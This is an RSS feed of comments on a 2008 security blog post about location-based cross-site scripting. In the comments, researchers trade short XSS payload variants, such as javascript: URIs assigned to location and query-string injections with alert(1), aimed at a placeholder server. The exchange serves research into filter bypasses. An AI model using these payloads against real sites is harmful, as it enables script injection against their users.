<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Location based XSS attacks</title>
	<atom:link href="http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/</link>
	<description>Javascript blog with messed up syntax inside</description>
	<lastBuildDate>Thu, 26 Jan 2012 01:38:34 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1384</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Sun, 28 Dec 2008 12:30:58 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=274#comment-1384</guid>
		<description>@ivan

Look up dom based XSS and that should answer your question.</description>
		<content:encoded><![CDATA[<p>@ivan</p>
<p>Look up dom based XSS and that should answer your question.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ivan</title>
		<link>http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1383</link>
		<dc:creator>Ivan</dc:creator>
		<pubDate>Sun, 28 Dec 2008 07:28:37 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=274#comment-1383</guid>
		<description>Can anyone explain, in which way this in an xss-attack?</description>
		<content:encoded><![CDATA[<p>Can anyone explain, in which way this in an xss-attack?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1372</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Mon, 01 Dec 2008 22:46:01 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=274#comment-1372</guid>
		<description>Yeah nice ones there&#039;s other ways too but I thought I&#039;d post the comment trick cause it&#039;s nice :)

location=&#039;javascript:alert%25281%2529&#039;</description>
		<content:encoded><![CDATA[<p>Yeah nice ones there&#8217;s other ways too but I thought I&#8217;d post the comment trick cause it&#8217;s nice <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>location=&#8217;javascript:alert%25281%2529&#8242;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Giorgio Maone</title>
		<link>http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1371</link>
		<dc:creator>Giorgio Maone</dc:creator>
		<pubDate>Mon, 01 Dec 2008 21:54:46 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=274#comment-1371</guid>
		<description>BTW, why not the ever green

http://someserver.com/somepage.php?param=â€œ,location=name

?</description>
		<content:encoded><![CDATA[<p>BTW, why not the ever green</p>
<p><a href="http://someserver.com/somepage.php?param=â€œ,location=name" rel="nofollow">http://someserver.com/somepage.php?param=â€œ,location=name</a></p>
<p>?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Giorgio Maone</title>
		<link>http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1370</link>
		<dc:creator>Giorgio Maone</dc:creator>
		<pubDate>Mon, 01 Dec 2008 21:51:40 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=274#comment-1370</guid>
		<description>Ooops (damn SpamBam)

http://someserver.com/somepage.php?param=â€œ,location=&#039;javascript:&#039;+location#%0aalert(1)</description>
		<content:encoded><![CDATA[<p>Ooops (damn SpamBam)</p>
<p><a href="http://someserver.com/somepage.php?param=â€œ,location=&#039;javascript:&#039;+location#alert(1)" rel="nofollow">http://someserver.com/somepage.php?param=â€œ,location=&#039;javascript:&#039;+location#alert(1)</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Giorgio Maone</title>
		<link>http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1369</link>
		<dc:creator>Giorgio Maone</dc:creator>
		<pubDate>Mon, 01 Dec 2008 21:50:43 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=274#comment-1369</guid>
		<description>http://someserver.com/somepage.php?param=&quot;,location=location#%0aalert(1)</description>
		<content:encoded><![CDATA[<p><a href="http://someserver.com/somepage.php?param=" rel="nofollow">http://someserver.com/somepage.php?param=</a>&#8220;,location=location#%0aalert(1)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: David Lindsay</title>
		<link>http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1368</link>
		<dc:creator>David Lindsay</dc:creator>
		<pubDate>Mon, 01 Dec 2008 18:08:54 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/?p=274#comment-1368</guid>
		<description>I really like the variation that avoids parenthesis.  It&#039;s cleaner than the setter trick and works cross browsers too.  I&#039;ll have to update my list of 2-stage injections to include it.</description>
		<content:encoded><![CDATA[<p>I really like the variation that avoids parenthesis.  It&#8217;s cleaner than the setter trick and works cross browsers too.  I&#8217;ll have to update my list of 2-stage injections to include it.</p>
]]></content:encoded>
	</item>
</channel>
</rss>

